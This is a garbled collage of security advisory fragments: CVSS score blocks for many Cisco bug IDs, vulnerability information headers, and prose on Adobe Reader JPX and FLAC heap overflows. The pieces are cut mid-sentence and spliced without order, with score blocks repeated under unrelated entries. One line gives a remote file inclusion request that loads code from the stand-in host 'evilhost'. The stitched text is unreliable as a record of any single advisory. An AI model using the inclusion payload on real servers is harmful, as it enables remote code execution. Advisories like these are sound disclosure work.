exploitable
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtc61990 - Coredump may be experienced when processing
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCso02147 ("NAT of SIP over TCP Vulnerability")
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq89842 ("CUP Server PE Vulnerable to XML Entity Expansion Attack")
Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE
*Vulnerability Information*
Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A
*Vulnerability Description*
http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php
1.2 Local File Include vulnerability found in script includes/events_application_top.php
Successful exploitation requires that "register_globals" is enabled.
Code
Authentication - None
Confidentiality Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCta33973: Cisco IOS Software Crafted BGP Update Message Vulnerability
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq63992 - CSM Arbitrary command execution vulnerability
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtt07949 - Cisco Wireless LAN Controllers IPv6 Denial of Service Vulnerability
privileges of the current user.
The vulnerability occurs when processing the Jp2c stream of a JpxDecode
encoded data stream within a PDF file. During the processing of a
JPC_MS_RGN marker, an integer sign extension may cause a bounds check
to be bypassed. This results in an exploitable memory corruption
vulnerability.
III. ANALYSIS
Exploitation of this vulnerability allows an attacker to execute
Typically, heap based buffer overflows can be difficult to exploit due
to modern heap implementations that perform heap integrity checks.
However, Adobe Reader and Acrobat use a custom heap allocator which can
be abused to write arbitrary values to arbitrary locations. Labs testing
has demonstrated this vulnerability is highly exploitable.
JavaScript is not required to exploit this vulnerability; however, it
does make exploitation simpler.
IV. DETECTION
software.
Whenever vulnerable software opens or processes a malformed FLAC file, it
uses the size fields as reference points to allocate memory (malloc) and
writes the contents of the file into those memory buffers. Setting
these values to an overly large value, such as 0xFFFFFFFF, could cause
an exploitable condition. Passing a size of 0xFFFFFFFF would cause a
malloc(0) immediately followed by a buffer overflow on the read. This
results in an exploitable heap overflow. Exploitation is dependent on
the data allocation location, heap structure and error handlers of the
affected software. After overwriting a large amount of memory and
pointers with arbitrary data, code execution could then be redirected to
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsu05515 - SD Camera Web Server Will Display any File on System
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsz40392 - CCM: Coredump in sipSafeStrlen from malicious INVITE
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCtc47823 - CCM Core at invalid Line# in SCCP RegAvailableLines and FwdStatReq
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCee72997 - P1 SA stuck in KEY_EXCH forever
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsw40789 - SSH connections denial of service vulnerability
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Crash handling invalid post for webauth (CSCsq44516)
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsk32606 - Malformed SIP packet can crash device
CSCsk40030 - Malformed Session Attribute can crash device
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtc46008 ("Privilege Escalation on DMM")
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsz43987 - IOS coredump when sending crafted packets
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCtb54493 - HTTP, RTSP, and SIP Inspection DoS Vulnerability
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97085 - Java RMI Command Injection
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCto63060 - Open Query Interface
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq67899 - Cisco Unity Denial Of Service Vulnerability
2. *Vulnerability Information*
Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840
Release mode: User release
*Vulnerability Information*
Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Client-side Exploitable: No
Bugtraq ID: 27944
CVE Name: CVE-2008-0923
2. *Vulnerability Information*
Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-2562
Bugtraq ID: 42199